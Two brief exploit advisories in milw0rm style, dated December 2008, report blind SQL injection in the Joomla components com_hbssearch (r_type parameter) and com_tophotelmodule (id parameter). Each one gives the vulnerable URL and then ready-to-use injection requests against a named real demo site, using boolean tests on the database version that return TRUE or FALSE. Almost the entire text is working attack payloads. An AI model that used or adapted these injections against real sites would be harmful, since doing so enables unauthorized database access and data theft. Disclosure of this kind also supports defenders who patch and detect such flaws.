Joomla Component com_hbssearch(r_type) Blind SQL-injection

http://localhost/Path/index.php?option=com_hbssearch&task=showhoteldetai ls&id=1&r_type=[SQL-vulnerability]

LiveDEMO:

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->FALSE

http://demo.joomlahbs.com/p1/index.php?option=com_hbssearch&task=showhoteldetai ls&id=4&r_type=1 and substring(@@version,1,1)=5&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&st ar=&child1=0&adult1=1&Itemid=54 -->TRUE

# milw0rm.com [2008-12-21]

Joomla Component com_tophotelmodule(id) Blind SQL-injection

Example:
http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=[SQL-vulnerability]


LiveDEMO:

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=4 -->FALSE

http://demo.joomlahbs.com/p2/index.php?option=com_tophotelmodule&task=showhotel details&id=1 and substring(@@version,1,1)=5 -->TRUE

# milw0rm.com [2008-12-21]